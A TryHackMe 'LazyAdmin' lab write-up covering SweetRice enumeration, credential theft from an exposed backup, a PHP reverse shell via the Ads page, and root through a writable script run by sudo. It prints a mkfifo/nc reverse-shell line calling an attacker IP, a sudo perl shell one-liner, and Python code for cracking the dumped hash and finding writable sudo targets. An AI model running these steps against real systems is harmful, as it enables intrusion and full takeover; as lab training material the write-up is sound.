LazyAdmin (THM)

TryHackMe LazyAdmin Write-Up

topics: Web application security, public exploits, PHP RCE through misconfigured website (OWASP), Linux Privilege Escalation

  1. Enumeration

  2. Local Privilege Escalation

  3. Root Privilege Escalation

tools: nmapAutomator, dirsearch, searchsploit, kali php reverse shell, perl, sudo

Enumeration

Initial nmap scan (via the nmapAutomator wrapper): ../.autonmap.sh $ip Full

We have two ports open, SSH and HTTP. HTTP serves the default Apache homepage, so let's run a dirsearch scan:

python3 dirsearch.py -u $ip -e php,html,txt

dirsearch finds one unique directory, /content. Navigating to it reveals a site running SweetRice, and checking SweetRice with searchsploit turns up several public exploits.

These offer several routes to local access. I first looked at the "Arbitrary File Upload" script, but it requires credentials. The "Backup Disclosure" text file points to a location that houses the site credentials.

The site is hosted under the /content directory, so for us the path is /content/inc/mysql_backup

The .sql file there contains the website credentials; cracking the password hash reveals manager:Password123
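As an added example (not code from the write-up, the box, or SweetRice itself), the following Python script automates this step: it pulls the admin name and password hash out of the mysql_backup dump and tries a wordlist against the hash. It assumes the dump stores site settings as a serialized PHP array with consecutive admin and passwd entries (the SweetRice 1.5.1 layout) and that the hash is unsalted MD5. The dump and wordlist embedded in it are constructed, not copied from the target.

```python
"""Recover the SweetRice admin login from a mysql_backup dump.

Added example for this write-up, not code from the box or from SweetRice.
Assumptions (labelled): the dump stores site settings as a serialized PHP
array with consecutive `admin` and `passwd` entries (SweetRice 1.5.1
layout), and the password hash is unsalted MD5.  SAMPLE_DUMP and
SAMPLE_WORDLIST below are constructed, not copied from the target.
"""
from __future__ import annotations

import hashlib
import re

# Serialized PHP strings look like s:<length>:"<value>"; the admin name and
# its hash sit next to each other in the global_setting array.
ADMIN_RE = re.compile(
    r's:5:"admin";s:\d+:"(?P<user>[^"]*)";'
    r's:6:"passwd";s:32:"(?P<hash>[0-9a-fA-F]{32})"'
)


def parse_backup(sql_text: str) -> list[tuple[str, str]]:
    """Return every (admin_name, md5_hex) pair found in the dump."""
    return [(m.group("user"), m.group("hash").lower())
            for m in ADMIN_RE.finditer(sql_text)]


def crack_md5(hex_digest: str, wordlist) -> str | None:
    """Return the first wordlist entry whose MD5 equals hex_digest, else None."""
    target = hex_digest.lower()
    for word in wordlist:
        word = word.rstrip("\r\n")          # tolerate lines read from a file
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None


def recover_credentials(sql_text: str, wordlist) -> list[tuple[str, str | None]]:
    """user -> cracked password (or None) for every admin entry in the dump."""
    words = list(wordlist)                  # materialise so it can be reused
    return [(user, crack_md5(h, words)) for user, h in parse_backup(sql_text)]


# --- constructed sample input (hash computed here so it stays consistent) ---
SAMPLE_HASH = hashlib.md5(b"Password123").hexdigest()
SAMPLE_DUMP = (
    "INSERT INTO `options` VALUES('1','global_setting','a:3:{"
    's:5:"admin";s:7:"manager";'
    f's:6:"passwd";s:32:"{SAMPLE_HASH}";'
    's:5:"title";s:0:"";}'
    "');\n"
)
SAMPLE_WORDLIST = ["password", "admin", "letmein", "Password123", "welcome1"]

if __name__ == "__main__":
    # Real use: recover_credentials(open("mysql_backup.sql").read(),
    #                               open("/usr/share/wordlists/rockyou.txt", errors="ignore"))
    for user, password in recover_credentials(SAMPLE_DUMP, SAMPLE_WORDLIST):
        print(f"{user}:{password or '<not in wordlist>'}")
```

Against the real dump you would pass the downloaded .sql text and a proper wordlist (the rockyou.txt path in the comment is the usual Kali location, assumed here); the regex only matches the admin/passwd pair, so other serialized fields in the dump are ignored.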

Coming back to the Python exploit with credentials, it does not execute properly and gives no error message to troubleshoot. However, the code mentions a login page at /as

Local Privilege Escalation

Now that we know the login page and have credentials, I went back through the searchsploit options, focusing on the PHP code execution entry.

The exploit works through the Ads section of the site dashboard: SweetRice writes each ad to a .php file under inc/ads/, so PHP placed in the ad body runs as the web server user when that file is requested. I used the Kali php-reverse-shell (/usr/share/webshells/php/php-reverse-shell.php), set its $ip and $port to my listener, and created a new ad containing it.

The exploit's instructions say the shell lands at /sweetrice/inc/ads/hacked.php; for us the site root is /content and the ad is named ww, so the path is /content/inc/ads/ww.php. Start the listener, request that URL, and the reverse shell gives us local access to the box as www-data.

Root Privilege Escalation

As always on Linux boxes, start with sudo -l

The sudo rule only allows perl with one specific script as its argument (and we do not have www-data's password anyway), so the generic GTFOBins one-liner sudo perl -e 'exec "/bin/sh";' is not an option.

Instead, the rule lets us run a Perl script in another user's home folder with sudo, so let's check its contents.

The script hands off to copy.sh, and we have read/write permission on that file, so we can add our own reverse shell line to it. Append a line with the attacking address and start a listener; because copy.sh runs line by line, nc tries the IP already in the file first and has to time out before our line runs, so expect the shell to take a minute to arrive.

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.6.18.145 5554 >/tmp/f' >> copy.sh

sudo /usr/bin/perl /home/itguy/backup.pl
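To make the check behind this escalation repeatable, here is an added Python example (not code from the write-up or from the box) that parses sudo -l output, follows a perl-with-script rule into the script, extracts the paths the script hands to system(), exec() or backticks, and reports which of those files, or the script itself, the current user can write to. The sudo -l text, the backup.pl contents and the /etc/copy.sh path embedded below are constructed stand-ins, not the real files; for real use swap the two callables for open().read and os.access as shown in the comment.

```python
"""Audit sudo rules of the form `NOPASSWD: /usr/bin/perl /path/script.pl`:
can we write to the script, or to anything the script executes?

Added example, not from the write-up or the box.  SAMPLE_SUDO_L,
SAMPLE_FILES and SAMPLE_WRITABLE are constructed stand-ins (the
/etc/copy.sh path is hypothetical).
"""
from __future__ import annotations

import os
import re
from typing import Callable

# One rule per line as sudo -l prints it, e.g.
#   (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
# Only rules naming an absolute command are captured.
_RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>/\S.*)$"
)

# Perl constructs that run another program: system(...), exec(...),
# `backticks` and qx(...).  We pull absolute paths out of their arguments.
_EXEC_RE = re.compile(r"\b(?:system|exec)\s*\(([^)]*)\)|`([^`]*)`|\bqx\(([^)]*)\)")
_PATH_RE = re.compile(r"/[\w./-]+")


def parse_sudo_rules(sudo_l_output: str) -> list[dict]:
    """Return [{'runas', 'nopasswd', 'argv'}] for each command line in sudo -l."""
    rules = []
    for line in sudo_l_output.splitlines():
        m = _RULE_RE.match(line)
        if m:
            rules.append({
                "runas": m.group("runas"),
                "nopasswd": "NOPASSWD" in m.group("tags"),
                "argv": m.group("cmd").split(),
            })
    return rules


def executed_paths(perl_source: str) -> list[str]:
    """Absolute paths passed to system/exec/backticks/qx in a Perl script."""
    found: list[str] = []
    for m in _EXEC_RE.finditer(perl_source):
        args = next(g for g in m.groups() if g is not None)
        found.extend(p for p in _PATH_RE.findall(args) if p not in found)
    return found


def audit_rule(rule: dict,
               read_file: Callable[[str], str],
               writable: Callable[[str], bool]) -> list[str]:
    """Files this rule runs as root that we can modify.

    Handles perl-with-a-script rules only; the script itself is checked
    first, then every path it hands to another program.
    """
    argv = rule["argv"]
    if len(argv) < 2 or os.path.basename(argv[0]) != "perl":
        return []
    script = argv[1]
    findings = []
    if writable(script):
        findings.append(script)            # we can edit the script directly
    for path in executed_paths(read_file(script)):
        if writable(path):
            findings.append(path)          # we can edit something it runs
    return findings


# --- constructed sample input ---
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
"""
SAMPLE_FILES = {
    "/home/itguy/backup.pl": '#!/usr/bin/perl\nsystem("sh", "/etc/copy.sh");\n',
}
SAMPLE_WRITABLE = {"/etc/copy.sh"}        # pretend only copy.sh is writable


def demo() -> list[str]:
    """Run the audit against the constructed sample; returns ['/etc/copy.sh']."""
    rule = parse_sudo_rules(SAMPLE_SUDO_L)[0]
    return audit_rule(rule, SAMPLE_FILES.__getitem__, SAMPLE_WRITABLE.__contains__)


if __name__ == "__main__":
    # Real use on the box:
    #   audit_rule(rule, lambda p: open(p).read(), lambda p: os.access(p, os.W_OK))
    print(demo())
```

The point of the second callable is that writability is what matters, not ownership: a root-owned copy.sh with mode 666 is just as exploitable as one we own, which is exactly the situation the echo >> copy.sh step above takes advantage of.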
